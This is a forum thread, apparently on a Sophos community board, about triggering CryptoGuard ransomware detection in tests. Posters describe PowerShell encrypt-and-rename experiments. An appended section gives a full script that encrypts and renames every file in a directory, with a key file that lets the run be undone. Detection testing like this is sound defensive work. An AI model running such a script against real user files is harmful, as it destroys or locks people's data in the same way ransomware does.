In an attempt to trigger CryptoGuard in a test setting I wrote several test scripts encrypting 50k+ files on disk in suspicious file paths. None of them seem to have triggered CryptoGuard, which makes me wonder if it's triggered solely on known IOCs. My first thought was that the number of I/O operations would have been enough to trigger an alarm, but it didn't. Is there something to be said about the detection that could help me trigger an alarm?
So, I took a bunch of files (copied the "Program Files (x86)" dir) and ran this against it. https://gist.github.com/arnydo/a0c41325e579b7dae3c8abd1a6b13980
"wonder if it's triggered solely on known IOCs": almost correct, eliminate the "known". File encryption is legitimate. Your test scripts likely lack villainousness; simply encrypting 50k+ files on disk in suspicious file paths (BTW: which paths do you call suspicious?) doesn't make them ransomware (or you a ransomware writer). Testing CryptoGuard or equivalent products is like testing whether your car's airbags would trigger (except that you don't have to replace CryptoGuard after it has triggered).
May I direct your attention to the following threads
That is a good question. I had the same thought and decided to test this out. I was able to trigger CryptoGuard though.
I am not sure exactly what triggered it. I tested multiple times. Sometimes it triggered and sometimes it didn't.
It all comes down to context and actions. How did you do the encryption? A PowerShell script that calls on Windows to encrypt the file?
Snr. New Product Introduction Engineer | CISSP | Sophos Technical Support
I used the .NET AesCryptoServiceProvider in PowerShell and ran it against a directory of files, renaming them as it went. It seemed to trigger Sophos after a certain number of files were encrypted. I forgot what the threshold was, it has been a while.
What you describe is what I would expect to happen. CG doesn't trigger instantly; it monitors and has a context-dependent rule set that will trigger when the thresholds/criteria are met.
I did use AesCryptoServiceProvider as well against more than 50k files, renaming them to .encrypted after encrypting them. I also ran test where I encrypt/decrypt them multiple times etc. but all without any luck. After that I created a .NET executable (.exe) to try if that makes a difference, but it didn't.
Can you tell more about the files you encrypted? (file size, age) that might be different. Also, did you test recently, or was that some time ago? Thanks for the responses so far!
It looks like I tested this the beginning of 2020.
I'll run it again and see what happens.
Please, let me know the results.
Kyle Parrish said: (copied the "Program Files (x86)" dir)
Thanks Kyle. I think this is the only noteworthy difference between your attempt and mine. I created dummy text files (created by another process to make it less obvious).
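For readers who want to reproduce the two experiments in this thread, here is an added example of the encrypt-and-rename loop both posters describe (AesCryptoServiceProvider from PowerShell, one directory, each file overwritten in place and renamed with a suffix). It is not the gist linked above, not Sophos code, and makes no claim about which of its actions CryptoGuard weighs; it only reproduces the I/O pattern under discussion so that the one difference the thread settles on (a copy of real files of mixed types versus generated text files) can be tested by pointing it at each kind of directory. Assumptions: it is run on a disposable, Sophos-protected test VM; -TargetDir is a throwaway copy you made for the test; the key file name, the .encrypted suffix and the -Decrypt switch are choices made here, not anything from the thread.

```powershell
<#
  Added example (not the gist from the thread, not Sophos code).
  Encrypts every file under a throwaway test directory with AES-CBC,
  overwriting each file in place and renaming it with a suffix, as the
  posts above describe. -Decrypt reverses a previous run using the key
  file the encrypting run wrote. Use ONLY against a copy you made for
  the test, on a test VM.
#>
param(
    [Parameter(Mandatory = $true)][string]$TargetDir,   # throwaway copy only
    [string]$Suffix   = '.encrypted',                   # arbitrary choice for this example
    [int]$MaxFiles    = 0,                              # 0 = no limit
    [switch]$Decrypt                                    # reverse a previous run
)

# Key/IV are saved next to the data so the run can be undone; a real
# ransomware family would not do this, but for a detection test the
# read/overwrite/rename pattern is what is being exercised, not the crypto.
$keyFile = Join-Path $TargetDir 'testrun.key'

$aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$aes.KeySize = 256                 # CBC mode and PKCS7 padding are the defaults

if ($Decrypt) {
    $lines   = Get-Content -LiteralPath $keyFile
    $aes.Key = [Convert]::FromBase64String($lines[0])
    $aes.IV  = [Convert]::FromBase64String($lines[1])
} else {
    $aes.GenerateKey()
    $aes.GenerateIV()
    Set-Content -LiteralPath $keyFile -Value @(
        [Convert]::ToBase64String($aes.Key),
        [Convert]::ToBase64String($aes.IV))
}

# Materialise the file list first so renaming during the loop cannot
# feed renamed files back into the enumeration.
$files = @(Get-ChildItem -LiteralPath $TargetDir -File -Recurse |
    Where-Object { $_.FullName -ne $keyFile } |
    Where-Object { if ($Decrypt) { $_.Extension -eq $Suffix } else { $_.Extension -ne $Suffix } })

$done = 0
foreach ($f in $files) {
    $xform = if ($Decrypt) { $aes.CreateDecryptor() } else { $aes.CreateEncryptor() }
    try {
        $in  = [IO.File]::ReadAllBytes($f.FullName)
        $out = $xform.TransformFinalBlock($in, 0, $in.Length)
    } finally {
        $xform.Dispose()
    }

    # Overwrite the original bytes in place, then rename: the sequence the
    # posts above used (read original, write ciphertext over it, change name).
    [IO.File]::WriteAllBytes($f.FullName, $out)
    $newName = if ($Decrypt) { $f.Name.Substring(0, $f.Name.Length - $Suffix.Length) }
               else          { $f.Name + $Suffix }
    Rename-Item -LiteralPath $f.FullName -NewName $newName

    $done++
    if ($MaxFiles -gt 0 -and $done -ge $MaxFiles) { break }
}

$verb = if ($Decrypt) { 'Decrypted' } else { 'Encrypted' }
Write-Output "$verb $done file(s) under $TargetDir"
```

Run it once against a copy of real files of mixed types (for instance a copy of a Program Files tree, as Kyle did) and once against a directory of generated text files, keeping everything else the same, e.g. `.\Encrypt-TestDir.ps1 -TargetDir C:\Temp\pf86copy` followed by the same command with `-Decrypt` (the script name and path are placeholders). Whether and when CryptoGuard reacts in each case is the result of the test, not something this example presumes; the thread itself reports that it sometimes fired and sometimes did not.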